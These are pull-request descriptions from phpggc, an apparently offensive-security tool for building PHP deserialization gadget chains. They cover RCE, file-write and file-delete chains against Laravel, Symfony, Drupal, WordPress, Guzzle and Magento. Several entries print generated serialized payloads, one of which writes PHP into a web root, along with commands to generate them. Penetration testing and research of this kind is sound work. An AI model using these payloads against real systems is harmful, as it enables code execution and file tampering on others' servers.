ambionics/phpggc

- gadgetchains/Phalcon/RCE/1/chain.php
- gadgetchains/Phalcon/RCE/1/gadgets.php
This is an RCE gadget chain for Phalcon < 1.2.3 I found a while ago: https://raz0r.name/talks/confidence-2013-php-object-injection-revisited/. This chain will call `render` method on `\Phalcon\Mvc\View\Engine\Php` which will eval() the contents of a local file. I am using here `php://input`, so that any code in POST data will be evaluated. Please note that we cannot set payload via an argument to __construct(), so the chain does not expect parameters.
> Add Phalcon < 1.2.3 RCE gadget chain

- gadgetchains/Guzzle/RCE/1/chain.php
- gadgetchains/Guzzle/RCE/1/gadgets.php
Hi guys!
This is a RCE on the GuzzleHttp\Psr7\FnStream class.
It's possible pass functions trough the _fn_* methods using call_user_func.
A point to consider is the fact that we can't pass args to the called func, just call void return funcs (phpinfo, etc)
Last version tested: 6.3.0
> - Guzzle 6.3.0 RCE via \GuzzleHttp\Psr7\FnStream

- gadgetchains/ZendFramework/RCE/1/chain.php
- gadgetchains/ZendFramework/RCE/1/gadgets.php
Adds the gadget documented starting on page 41 here
https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf
I'm not sure exactly how far back this works in ZF1 versions, but works in the newest version. It also works in versions of Magento 1 that I've tested (which includes and autoloads the necessary ZF1 classes).
> Add ZF1 RCE Gadget

- gadgetchains/Guzzle/FW/1/chain.php
Guzzle was updated to version 6.3.2 recently.
The file write gadget is still present. Reviewing the git log shows no major changes to the library code - mostly minor refactoring.
Tested with Guzzle 6.3.2 (installed with composer) on Ubuntu 16 `Apache/2.4.18 (Ubuntu)` `PHP 7.0.28-0ubuntu0.16.04.1`.
```bash
$ ./phpggc -s Guzzle/FW1 '/var/www/html/test.php' '/tmp/asdf'
O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{s:41:"%00GuzzleHttp\Cookie\FileCookieJar%00filename";s:22:"/var/www/html/test.php";s:52:"%00GuzzleHttp\Cookie\FileCookieJar%00storeSessionCookies";b:1;s:36:"%00GuzzleHttp\Cookie\CookieJar%00cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"%00GuzzleHttp\Cookie\SetCookie%00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:21:"<?php echo …
```
> Update Guzzle/FW/1 max supported version 6.3.2

- gadgetchains/Guzzle/RCE/1/chain.php
Guzzle was updated to version 6.3.2 recently.
The RCE gadget is still present.
Tested with Guzzle 6.3.2 (installed with composer) on Ubuntu 16 `Apache/2.4.18 (Ubuntu)` `PHP 7.0.28-0ubuntu0.16.04.1`.
```bash
$ ./phpggc -s Guzzle/RCE1 'phpinfo();'
O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"%00GuzzleHttp\Psr7\FnStream%00methods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"%00GuzzleHttp\HandlerStack%00handler";s:10:"phpinfo();";s:30:"%00GuzzleHttp\HandlerStack%00stack";a:1:{i:0;a:1:{i:0;s:6:"assert";}}s:31:"%00GuzzleHttp\HandlerStack%00cached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}
```
```bash
$ cat /var/www/html/asdf.php 
<?php
require 'vendor/autoload.php';
unserialize($_GET['test']);
?>
```
```bash …
```
> Update Guzzle/RCE/1 max supported version 6.3.2

- lib/PHPGGC/GadgetChain.php
Type is empty when requesting info on an existing gadget. Changing self::$type to $this::$type into GadgetChain::__toString should fix this.
> self::$type does not show the gadget type when requesting infos.

- README.md
- gadgetchains/Drupal7/RCE/1/chain.php
- gadgetchains/Drupal7/RCE/1/gadgets.php
Adding Drupal7/RCE1 __destruct gadget using SchemaCache. It was the intended solution for my challenge for Insomnihack 2019's teaser, and was also well explained by RIPSTech team here : 
https://blog.ripstech.com/2019/complex-drupal-pop-chain/
> Add Drupal7 >= 7.0.8 gadget using SchemaCache __destruct

- gadgetchains/Drupal7/FD/1/chain.php
- gadgetchains/Drupal7/FD/1/gadgets.php
New gadget chain that uses the `Archive_Tar`'s destructor to unlink (delete) files.
Tested on Drupal 7.61 with simple unserialize method that gets the payload from a GET param.
Used the following command to generate the payload:
`/opt/phpggc/phpggc -f -a -u Drupal7/FD1 delete-me.txt`
> Add Drupal7 file download gadget chain

- gadgetchains/Magento/FW/1/chain.php
- gadgetchains/Magento/FW/1/gadgets.php
This is a file write gadgetchain on Magento 1. 
Tested it on the latest version (1.9.4.0).
It will throw an error during deserialization, but the file gets written anyway.
> Add Magento FW gadgetchain

- lib/PHPGGC/GadgetChain/FileWrite.php
For some reason the `file://` wrapper doesn't seem to work like this on my system (MacOS / PHP 7.1)
```
$ cat info.php 
<?php
phpinfo();
$ php -r 'var_dump(file_exists("file://info.php")) . PHP_EOL;'
bool(false)
$ php -r 'var_dump(file_exists("info.php")) . PHP_EOL;'
bool(true)
```
I'm not seeing any reason why the `file://` wrapper is even needed here...
> Don't use file:// wrapper

- README.md
- gadgetchains/ZendFramework/RCE/3/chain.php
- gadgetchains/ZendFramework/RCE/3/gadgets.php
This adds a new RCE chain for ZendFramework2. 
I have tested it on version 2.0.1 and on the latest version 2.5.3, so I'm quite certain it works on any version after (and including) 2.0.1.
It throws an exception, but the command is executed before that
> Add ZendFramework2 RCE chain

- README.md
- gadgetchains/WordPress/RCE/WooCommerce1/chain.php
- gadgetchains/WordPress/RCE/WooCommerce1/gadgets.php
- gadgetchains/WordPress/RCE/YetAnotherStarsRating/chain.php
- gadgetchains/WordPress/RCE/YetAnotherStarsRating/gadgets.php
- woocommerce:
Not a RCE directly in WooCommerce but can be used as a chain, see the BSide Manchester Conf about it https://www.youtube.com/watch?v=GePBmsNJw6Y&feature=youtu.be&t=1763.
I've used it in real case scenario during assessments where WordPress plugins had unserialize() statements with unvalidated user data and the blogs had the WooCommerce plugin installed.
- yet-another-stars-rating
https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress
https://wpvulndb.com/vulnerabilities/9207
Notes:
I had to play with the folder naming a bit, as `WordPress/WooCommerce/RCE1` didn't work.
I've also updated the Readme to reflect the latest GadgetChains added, including these ones.
I wonder if I should put them in a plugins/plugin sub folder, as there …
> Adds some WordPress chains from plugins

- lib/PHPGGC/Phar/Format.php
- lib/PHPGGC/Phar/Tar.php
This change allows building tar polyglot phars that are detected as image by file/libmagic.
It builds upon the fact that libmagic and php use different code to validate the tar checksum.
In particular, php stops as soon as any non-octal digit is found and then just returns the value so far,
while tar will always fail the checksum check if there is a non-octal digit. This is used to construct
a phar that PHP can parse but which isn't detected as tar by file due to the failing checksum.
> Improvements to polyglot phar generation

- lib/PHPGGC.php
This fixes issue #58 .
It will no longer output a newline when the PHAR `-p` option is used.
> Don't output newline when using PHAR

- gadgetchains/Pydio/Guzzle/RCE/1/chain.php
- gadgetchains/Pydio/Guzzle/RCE/1/gadgets.php
I used this gadgetchain to create a POC for CVE-2018-20718. Vulnerability discovered by RIPS in Pydio < 8.2.2.
More detail here : https://blog.ripstech.com/2018/pydio-unauthenticated-remote-code-execution/
My POC here : https://github.com/us3r777/CVE-2018-20718
> Add Pydio/guzzle RCE gadgetchain

- gadgetchains/Laravel/RCE/5/chain.php
- gadgetchains/Laravel/RCE/5/gadgets.php
The gadget chain is for Laravel, test on v5.8.30.
I checked other gadgets, it always needs to be passed in a function like `system`, `passthru`, `assert`, but:
- After PHP 7, `assert` is no longer a function, it can't be dynamic execute.
- On some virtual hosts, command functions may be denied.
Unlike other gadgets, this POC has no restrictions on PHP, just execute arbitrary PHP code through `eval()`.
Usage:
```
$ php phpggc laravel/rce5 -a 'phpinfo();'
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{S:9:"\00*\00events";O:25:"Illuminate\Bus\Dispatcher":1:{S:16:"\00*\00queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;S:4:"load";}}S:8:"\00*\00event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{S:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{S:9:"\00*\00con …
```
> add laravel rce (until newest version) gadgetchain

- gadgetchains/Laravel/RCE/6/chain.php
- gadgetchains/Laravel/RCE/6/gadgets.php
I've had some issue with the payload of Laravel/RCE5 in some cases. The core issue is that if the server does string operation with the deserialized payload, it will crash and cause the server to prematurely close the output buffer before "__destruct" is invoked. To avoid this problem, the new version wraps the payload in an objet that has a "__toString" that doesn't crash.
Is making a new gadget OK or should I update the existing one ?
> More stable version of RC5

- README.md
- gadgetchains/WordPress/Guzzle/RCE/1/chain.php
- gadgetchains/WordPress/Guzzle/RCE/2/chain.php
- Fixes wrong namespace for the Wordpress/Guzzle/RCE2 gadget
- Updates the latest working version for Wordpress/Guzzle/RCE gadgets
- Updates Readme to reflect changes
> Updates WordPress/Guzzle gadgets and Readme

- README.md
- gadgetchains/Symfony/RCE/4/chain.php
- gadgetchains/Symfony/RCE/4/gadgets.php
Chain for Symfony:
* `3.4.0 <= 3.4.34`
* `4.2.0 <= 4.2.11`
* `4.3.0 <= 4.3.7`
Bug was originally found by `wisdomtree`, fixed by `Nicolas Grekas` on Symfony `3.4.35`, `4.2.12` and `4.3.8`, and referenced as `CVE-2019-18889`.
References:
* https://symfony.com/blog/cve-2019-18889-forbid-serializing-abstractadapter-and-tagawareadapter-instances
* https://hachp1.github.io/posts/Web%E5%AE%89%E5%85%A8/20190906-laravel_pop1.html
> Added Symfony RCE4

- README.md
- gadgetchains/Monolog/RCE/3/chain.php
- gadgetchains/Monolog/RCE/3/gadgets.php
Inspired by Monolog RCE1 and RCE2, this chain (RCE3) uses a similar approach with compatibility for all releases less than 1.11.0.
I also updated the version coverage information for the RCE1 gadget. It still works with latest. :)
Thank you!
> Added Monolog < 1.11.0 RCE

- lib/PHPGGC.php
... as curly bracket syntax has been deprecated in PHP 7.4.
Hi there gret tool. 
I ran it under PHP 7.4.7 and got a couple of E_DEPRECATED warnings with message
`PHP Deprecated:  Array and string offset access syntax with curly braces is deprecated ...`
Which cluttered up the terminal. 
Looks like they are removing that syntax
See https://wiki.php.net/rfc/deprecate_curly_braces_array_access
> Use square bracket syntax for string offset 

- README.md
- gadgetchains/WordPress/P/WooCommerce/RCE/2/chain.php
- gadgetchains/WordPress/P/WooCommerce/RCE/2/gadgets.php
This PR written by @parzel and me adds an adapted version of the WooCommerce RCE gadgetchain
to work with WooCommerce version prior to 3.4, using the class WC_Logger
instead of WC_Log_Handler_File.
> Adapt WooCommerce RCE gadgetchain to version <=3.4

- gadgetchains/TCPDF/1/chain.php
- gadgetchains/TCPDF/1/gadgets.php
A PR for a file delete gadget chain for TCPDF. [TCPDF](https://github.com/tecnickcom/TCPDF) is an 
> Official clone of PHP library to generate PDF documents and barcodes
The vulnerable code within the __destruct is [here](https://github.com/tecnickcom/TCPDF/blob/main/tcpdf.php#L7788-L7792)
https://github.com/tecnickcom/TCPDF/blob/main/tcpdf.php#L7788-L7792
> Add TCPDF/FD1 gadget chain for TCPDF <= 6.3.5

- README.md
- gadgetchains/PHPExcel/FD/1/chain.php
- gadgetchains/PHPExcel/FD/1/gadgets.php
- gadgetchains/PHPExcel/FD/2/chain.php
- gadgetchains/PHPExcel/FD/2/gadgets.php
- gadgetchains/PHPExcel/FD/3/chain.php
- gadgetchains/PHPExcel/FD/3/gadgets.php
- gadgetchains/PHPExcel/FD/4/chain.php
- gadgetchains/PHPExcel/FD/4/gadgets.php
- gadgetchains/WordPress/PHPExcel/RCE/1/chain.php
- gadgetchains/WordPress/PHPExcel/RCE/1/gadgets.php
- gadgetchains/WordPress/PHPExcel/RCE/2/chain.php
- gadgetchains/WordPress/PHPExcel/RCE/2/gadgets.php
- gadgetchains/WordPress/PHPExcel/RCE/3/chain.php
- gadgetchains/WordPress/PHPExcel/RCE/3/gadgets.php
- gadgetchains/WordPress/PHPExcel/RCE/4/chain.php
- gadgetchains/WordPress/PHPExcel/RCE/4/gadgets.php
- gadgetchains/WordPress/PHPExcel/RCE/5/chain.php
- gadgetchains/WordPress/PHPExcel/RCE/5/gadgets.php
- gadgetchains/WordPress/PHPExcel/RCE/6/chain.php
- gadgetchains/WordPress/PHPExcel/RCE/6/gadgets.php
Adds some PHPExcel gadgets.
The library (https://github.com/PHPOffice/PHPExcel) is no longer maintained and has been replaced by PHPSpreadSheet, but is still used in some projects (ie WP plugins).
Before v1.8.2, internal variables were prefixed with `_`, hence why there are a lot of gadgets, as 50% are for < 1.8.2, while the other 50% are for >= 1.8.2.
As far as WP is concerned, RCE via `__destruct` was possible by chaining with the `__toString` vector.
Outside of WP, Arbitrary File delete can be achieved.
> Adds PHPExcel gadgets

- Dockerfile
- README.md
- gadgetchains/WordPress/Dompdf/RCE/1/chain.php
Same as https://github.com/ambionics/phpggc/pull/75 but in a proper branch
Adds a Dockerfile, to allow users to build a docker image of the tool. This make usage of the tool a bit easier w/o having to install php and so on.
Building:
- `git clone https://github.com/ambionics/phpggc.git && cd phpggc`
- `docker build . -t phpggc`
Usage:
`docker run --rm phpggc`
For example: `docker run --rm phpggc Laravel/RCE1 system id -s`
Beware that when using file input/output options (such as `--pj`, `-o` etc), volumes will have to be mounted via the CLI command to have the files accessible inside the container.
I would recommend you to create a repository on https://hub.docker.com/ and configure an automated build triggered when a commit is done on the GH repo, to automatically build a new image. That …
> Dockerise the tool

- README.md
- gadgetchains/PHPCSFixer/FD/1/chain.php
- gadgetchains/PHPCSFixer/FD/1/gadgets.php
- gadgetchains/PHPCSFixer/FD/2/chain.php
- gadgetchains/PHPCSFixer/FD/2/gadgets.php
This PR adds two File Delete gadgets for https://github.com/FriendsOfPHP/PHP-CS-Fixer which was fixed in 2.17.4 (https://github.com/FriendsOfPHP/PHP-CS-Fixer/commit/486254000b5d4cb9e770eb6d488e162fb885b295)
> Add PHP-CS-Fixer FD Gadgets

- README.md
- gadgetchains/Laminas/FW/1/chain.php
- gadgetchains/Laminas/FW/1/gadgets.php
This PR adds a FW chain for the framework Laminas. I used [phpggc_tester](https://github.com/Mayfly277/phpggc_tester) (really helpful tool, kudos!) to find out which versions are covered:
Right now, this module does not support creating files without any extension, they will always have a trailing dot. It can probably be done with more work and a bigger chain 🤷‍♂️
> Add Laminas/FW1

- gadgetchains/ThinkPHP/RCE/2/chain.php
- gadgetchains/ThinkPHP/RCE/2/gadgets.php
This is a RCE gadget chain for ThinkPHP 5.0.24, but it can also work for 5.0.4-5.0.24, but is tested only on 5.0.24.
The specifics of the gadget is that it does not use file-write, so you don't need to have writeable directories.
This was discovered in 0ctf finals challenge RevengePHP, so huge shoutout to c014 who should be the initial discoverer of this chain. It can call any function not only system().
> adding RCE POP chain for ThinkPHP 5.0.24

- gadgetchains/Magento2/FD/1/chain.php
- gadgetchains/Magento2/FD/1/gadgets.php
`__destruct()` chain capable of deleting any files/directory inside the Magento2 installation dir. It's not yet patched and works well till the latest version (2.4)
> Arbitrary file deletion in Magento2

- gadgetchains/Magento2/FD/1/chain.php
`test_setup` expects, that FD chain parameter named remote_path
> Unify parameter name for chain

- gadgetchains/Drupal9/RCE/1/chain.php
- gadgetchains/Drupal9/RCE/1/gadgets.php
Hello,
Here's a gadgetchain for Drupal 9, should work from something like Drupal 8.9.6 up to the latest Drupal 9 version (at the time of this pull request, it is 9.4.9).
The call stack is the following:
1. \GuzzleHttp\Cookie\FileCookieJar->__destruct()
2. \Laminas\Diactoros\RelativeStream->__toString()
3. \GuzzleHttp\Psr7\PumpStream->getContents()
4. \Drupal\Core\Config\CachedStorage->read()
5. \Drupal\Component\DependencyInjection\Container->get()
6. \Drupal\Component\DependencyInjection\Container->createService()
7. call_user_func_array()
🚀
> Add Drupal9/RCE1

- Dockerfile
- README.md
- gadgetchains/Doctrine/RCE/1/chain.php
- gadgetchains/Doctrine/RCE/1/gadgets.php
- gadgetchains/Doctrine/RCE/2/chain.php
- gadgetchains/Doctrine/RCE/2/gadgets.php
- test-gc-compatibility.py
I adapted test-gc-compatibility.py and added some features on it.
test-gc was installing the packages with the option `--ignore-platform-reqs` which installed the packages without taking in consideration the version of PHP running the payloads, which can cause some issues if incompatible packages are installed, in my case it broke the dependency `psr/log` and installed the latest, even if it is not compatible with PHP 7.4.
So I replaced it with the option `--ignore-platform-req=ext-*` which takes the PHP version in consideration but ignores PHP extensions requirements.
Since the PHP version on which the gadget chain runs can cause unexpected issues, I printed it at the start of _test-gc_ to make it easier to debug.
Before this update, running test-gc on packages with a ton of version such …
> Added features on test-gc + 2 doctrine-bundle RCE

- gadgetchains/Laravel/RCE/13/chain.php
- gadgetchains/Laravel/RCE/13/gadgets.php
- gadgetchains/Laravel/RCE/14/chain.php
- gadgetchains/Laravel/RCE/14/gadgets.php
- gadgetchains/Laravel/RCE/15/chain.php
- gadgetchains/Laravel/RCE/15/gadgets.php
- gadgetchains/Laravel/RCE/16/chain.php
- gadgetchains/Laravel/RCE/16/gadgets.php
Hi, for your convenience this time, I test the compatibility and have some questions.
The result of test-gc-compatibility.py shows that RCE13, RCE15 and RCE16 maps these versions:
......
......
which I have written in the chain.php.
But when I use composer to build and test the project manually, the results show that it all worked. And I am confused about this.
for example the 8.6.12:
```bash
root@26ff7789df03:/phpggc# composer create-project laravel/laravel=8.6.12 laravel_8.6.12
root@26ff7789df03:/phpggc# cd laravel_8.6.12/
root@26ff7789df03:/phpggc/laravel_8.6.12# php ../phpggc laravel/rce12 --test-payload
Trying to deserialize payload...
SUCCESS: Payload triggered !
root@26ff7789df03:/phpggc/laravel_8.6.12# php ../phpggc laravel/rce14 --test-payload
Trying to deserialize payload...
PHP …
```
> the rest of chains for Laravel

- gadgetchains/PHPWord/FD/1/chain.php
- gadgetchains/PHPWord/FD/1/gadgets.php
I would like to add my [PHPWord](https://github.com/PHPOffice/PHPWord) gadget chain to PHPGGC.
> A pure PHP library for reading and writing word processing documents.
- Library name:
- PHPWord
- PHPOffice / PHPWord
- URL:
- [https://github.com/PHPOffice/PHPWord](https://github.com/PHPOffice/PHPWord)
Below is the responsible code.
File: <span style="color:red">src/PhpWord/Shared/XMLWriter.php</span><br>
Version: Commit <= [77438025265482ddcf050bce520d3c2b51645108](https://github.com/PHPOffice/PHPWord/commit/77438025265482ddcf050bce520d3c2b51645108)
```php
<?php
...
namespace PhpOffice\PhpWord\Shared;
use Exception;
use ReturnTypeWillChange;
...
class XMLWriter extends \XMLWriter
{
/** Temporary storage method */
const STORAGE_MEMORY = 1;
const STORAGE_DISK = 2;
/**
* …
```
> PHPWord: Added FD/1, which targets PHPWord versions <= 1.1.0

- gadgetchains/Symfony/RCE/11/chain.php
Hi,
This PR improves the Symfony/RCE11 gadget chain by removing the redundant dependency on `symfony/browserkit`.
In the original gadget chain, `\Symfony\Component\BrowserKit\Response` was used to trigger a `foreach()` loop in `__toString()`. 
However, I realised that some Symfony-based applications do not actually have `symfony/browserkit` installed. After taking a quick look at the Symfony/RCE11 gadget chain, it would appear that the `\Symfony\Component\Validator\ConstraintViolationList` class has the following [`__toString()` implementation](https://github.com/symfony/symfony/blob/v6.3.1/src/Symfony/Component/Validator/ConstraintViolationList.php#L50-L59):
~~~php
public function __toString()
{
$string = '';
foreach ($this->violations as $violation) { // triggers getIterator()
$string …
> Minor improvement to Symfony/RCE11 Chain

- gadgetchains/CodeIgniter4/FD/1/chain.php
- gadgetchains/CodeIgniter4/FD/1/gadgets.php
I would like to add my [CodeIgniter4](https://github.com/codeigniter4/CodeIgniter4) gadget chain to PHPGGC.
> Open Source PHP Framework (originally from EllisLab) .
- Framework name:
- CodeIgniter4
- codeigniter4 / CodeIgniter4
- URL:
- [https://github.com/codeigniter4/CodeIgniter4](https://github.com/codeigniter4/CodeIgniter4)
Below is the responsible code.
File: <span style="color:red">system/Cache/Handlers/RedisHandler.php</span>
```php
<?php
...
namespace CodeIgniter\Cache\Handlers;
use CodeIgniter\Exceptions\CriticalError;
use CodeIgniter\I18n\Time;
use Config\Cache;
use Redis;
use RedisException;
/**
* Redis cache handler
*/
class RedisHandler extends BaseHandler
{
/**
* Default config
*
* @var array
*/
protected $config = [
'host'     => '127.0.0.1',
'password' …
```
> CodeIgniter4: Added FD/1, which targets CodeIgniter4 versions <= 4.3.6

- gadgetchains/Drupal9/RCE/1/chain.php
I've checked the exploitability for Drupal 9.5.10, and it works!
> Update of the version compatible with the Drupal9/RCE1 exploit

- phpggc
Disable phar.readonly to ensure smooth phar payload generation
> Avoid phar.readonly warning

- phpggc
As described [in the coreutils manual](https://www.gnu.org/software/coreutils/manual/coreutils.html#g_t_002dS_002f_002d_002dsplit_002dstring-usage-in-scripts), `-S` is "used to pass multiple arguments on shebang lines". Fixes #163.
> Update shebang to use env -S

- gadgetchains/WordPress/RCE/1/chain.php
- gadgetchains/WordPress/RCE/1/gadgets.php
Hi,
I just added the PoC for the [RCE Gadget Chain in WordPress Core](https://wpscan.com/blog/finding-a-rce-gadget-chain-in-wordpress-core/) for WordPress < 6.3.2.
> Add RCE Gadget Chain WordPress Core

- gadgetchains/Laravel/RCE/19/chain.php
- gadgetchains/Laravel/RCE/19/gadgets.php
I would like to add my [Laravel](https://github.com/laravel/framework) gadgets chain to PHPGGC.
> Laravel is a web application framework.
- Framework name:
- Laravel
- laravel / framework
- URL:
- [https://github.com/laravel/framework](https://github.com/laravel/framework)
> This technique is known so there is nothing new.
When we search for gadgets chain, we audit the code of all objects in the framework and, more specifically, the code of the following magic methods:
- `__wakeup()`
- `__destruct()`
- `__toString()`
- `__call()`
- `__get()`
The purpose of this pull request is to help noephites like me by clarifying the possibility of using the magic method `_destruct()` as a proxy to reach other magic methods, such as `__toString()`, `__call()` or `__get()`.
The …
> Laravel: Added RCE/19, which targets Laravel versions 5.6 <= 10.x

- gadgetchains/Drupal7/RCE/1/chain.php
Drupal 7.99, released on 2023-12-06, includes a fix that means this gadget chain no longer works. Sorry :)
- https://www.drupal.org/project/drupal/releases/7.99
- https://www.drupal.org/node/3381030
- https://www.drupal.org/node/3378257
> Fixed version for Drupal7/RCE1

- gadgetchains/WordPress/RCE/2/chain.php
This chain was patched in https://github.com/WordPress/WordPress/commit/46406afcc4cc938f44115c49ae775bad52039710.
> WordPress/RCE2: Update vulnerable versions

- gadgetchains/Symfony/RCE/12/chain.php
- gadgetchains/Symfony/RCE/12/gadgets.php
- gadgetchains/Symfony/RCE/13/chain.php
- gadgetchains/Symfony/RCE/13/gadgets.php
- gadgetchains/Symfony/RCE/14/chain.php
- gadgetchains/Symfony/RCE/14/gadgets.php
- gadgetchains/Symfony/RCE/15/chain.php
- gadgetchains/Symfony/RCE/15/gadgets.php
I created 2 gadget chains for all versions of Symfony 1 including the 1.5 fork maintained here https://github.com/FriendsOfSymfony1/symfony1
Symfony1 is not maintained any more. Sensiolabs has been contacted but they won't provide a fix since Symfony1 is end of life.
Symfony1.5.13 and greater are still  partially vulnerable depending on how you install it, but no maintainers are responding.
> Adding Symfony 1.0 to 1.5 RCE gadget chains

- gadgetchains/Symfony/RCE/12/chain.php
- gadgetchains/Symfony/RCE/16/chain.php
- gadgetchains/Symfony/RCE/16/gadgets.php
Adding another Symfony RCE gadget chain (CVE-2024-28861). This one is more powerful, since it covers all versions from 1.1 to 1.5, with no breaking changes.
A release of Symfony 1.5 has been done today (1.5.19) with the fix.
Also added the CVE number for the previous Symfony/RCE/12 chain in the information.
> Adding another Symfony 1.1 to 1.5 RCE gadget chain (CVE-2024-28861)

- lib/PHPGGC.php
Hey Charles,
I'm suggesting a new option, `--session-encode`/`-se` to allow generation of payloads using `session_encode()` instead of `serialize()`.
The rationale behind introducing this option is documented in the changes as well:
> This is useful if you have an existing arbitrary file write primitive, but the web root directory is non-writable. In such cases, it is possible to forge a session file containing an `unserialize()` payload and trigger the chain by visiting any webpage that invokes `session_start()`.
Since introducing the `--session-encode` option as an enhancement, wrapper or encoder would require deserialising the payload and re-serialising it with `session_encode()`, I opted to implement this in `PHPGGC::serialize()`.
> Introduce --session-encode/-se option

- lib/PHPGGC.php
> Use RFC3986-compliant URL-encoding for url and soft encoders

- lib/PHPGGC/GadgetChain/RCE/FunctionCall.php
Hello,
I made a change to `FunctionCall.php` to provide better information when users use `./phpggc -l`.
Thank you for sharing PHPGGC, wrapwrap, cnext, ... 🙏
> Update FunctionCall.php: $type_description => "Function Call"

- gadgetchains/Symfony/RCE/14/gadgets.php
In Symfony/RCE/14, the PropelDateTime class did not initialized the parent DateTime object causing the error : `PHP Fatal error:  Uncaught Error: The DateTime object has not been correctly initialized by its constructor`
In PHP5, it did not seem to cause issue, but it did in higher versions like php8.
> Fixing Symfony/RCE/14: PHP Fatal error in PHP >5

- README.md
- lib/PHPGGC.php
Tiny thing I missed in PR #196 - sorry!
This adds the `-pub` abbreviation to the help text for the new option.
> docs / help text for public-properties enhancement

- gadgetchains/Plates/RCE/1/chain.php
- gadgetchains/Plates/RCE/1/gadgets.php
This is a gadget to get RCE in the "League/Plates" library. The chain is started in a __toString() call.
> added Plates RCE gadget chain
